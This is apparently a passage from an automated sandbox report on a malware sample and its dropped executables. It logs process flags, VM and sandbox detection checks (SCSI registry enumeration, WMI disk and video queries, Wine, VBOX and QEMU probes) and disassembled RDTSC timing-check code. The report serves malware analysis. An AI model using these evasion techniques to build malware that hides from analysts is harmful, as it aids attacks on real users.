Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 1094553
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 143A094
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 1166CB9
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 11010CA
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 145E222
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 10C2412
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 151863F
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 119E1D4
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 1428991
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 11ADA33
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 10C7DE7
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 14E7B04
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 10C34C9
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 112DD10
Source: C:\Users\user\AppData\Local\Temp\6.exe	API/Special instruction interceptor: Address: 1164A65
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	API/Special instruction interceptor: Address: 7FFB2CECE814
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	API/Special instruction interceptor: Address: 7FFB2CECD584

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\7.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,
Source: 1.exe, 00000021.00000002.2009699613.00000000025AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: CBF2FC second address: CBEBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jbe 00007FDB98EABA2Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D1A4Fh], ecx 0x00000018 push dword ptr [ebp+122D0585h] 0x0000001e cld 0x0000001f xor dword ptr [ebp+122D30E2h], esi 0x00000025 call dword ptr [ebp+122D30D1h] 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D30C7h], ecx 0x00000032 xor eax, eax 0x00000034 clc 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jl 00007FDB98EABA27h 0x0000003f cmc 0x00000040 mov dword ptr [ebp+122D2C75h], eax 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c cmc 0x0000004d mov dword ptr [ebp+122D30C7h], ecx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FDB98EABA30h 0x0000005c lodsw 0x0000005e jne 00007FDB98EABA2Ch 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FDB98EABA31h 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 jns 00007FDB98EABA2Ch 0x00000078 mov dword ptr [ebp+122D27D6h], ebx 0x0000007e popad 0x0000007f nop 0x00000080 jmp 00007FDB98EABA2Dh 0x00000085 push eax 0x00000086 pushad 0x00000087 jc 00007FDB98EABA2Ch 0x0000008d push eax 0x0000008e push edx 0x0000008f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29BDE second address: E29BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29BE2 second address: E29BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29BE6 second address: E29BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29BF0 second address: E29C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA38h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29C0C second address: E29C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E29212 second address: E29221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FDB98EABA26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E293AD second address: E293C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3D7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D1C6 second address: E2D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 4063D733h 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D2824h], edx 0x00000014 mov ecx, 15B87FE4h 0x00000019 popad 0x0000001a lea ebx, dword ptr [ebp+12442002h] 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FDB98EABA28h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D37FDh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push ebx 0x00000043 jmp 00007FDB98EABA34h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D22C second address: E2D230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D29C second address: E2D2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D2A0 second address: E2D2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D2AC second address: E2D363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA36h 0x00000009 popad 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FDB98EABA28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dh, 69h 0x00000028 push 00000000h 0x0000002a or dword ptr [ebp+122D1B3Ch], ecx 0x00000030 call 00007FDB98EABA29h 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007FDB98EABA30h 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f jmp 00007FDB98EABA32h 0x00000044 popad 0x00000045 push eax 0x00000046 ja 00007FDB98EABA3Eh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 jmp 00007FDB98EABA35h 0x00000055 mov eax, dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a pushad 0x0000005b popad 0x0000005c pop ebx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D363 second address: E2D3D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FDB98EAF3C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FDB98EAF3D7h 0x00000015 pop eax 0x00000016 mov dl, cl 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FDB98EAF3C8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov dx, 9CD9h 0x00000038 push 00000000h 0x0000003a pushad 0x0000003b push ecx 0x0000003c mov bx, 7764h 0x00000040 pop esi 0x00000041 popad 0x00000042 push 00000003h 0x00000044 mov si, cx 0x00000047 push edx 0x00000048 mov di, ax 0x0000004b pop ecx 0x0000004c push 9C328BBBh 0x00000051 push eax 0x00000052 push edx 0x00000053 jl 00007FDB98EAF3C8h 0x00000059 push edi 0x0000005a pop edi 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D3D9 second address: E2D3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDB98EABA26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D3E3 second address: E2D40A instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 23CD7445h 0x00000013 sub dword ptr [ebp+122D37FDh], edi 0x00000019 lea ebx, dword ptr [ebp+1244200Bh] 0x0000001f mov esi, edi 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push edi 0x00000026 pop edi 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D40A second address: E2D40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D40E second address: E2D445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FDB98EAF3D8h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007FDB98EAF3CFh 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2D5A4 second address: E2D5AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDB98EABA2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
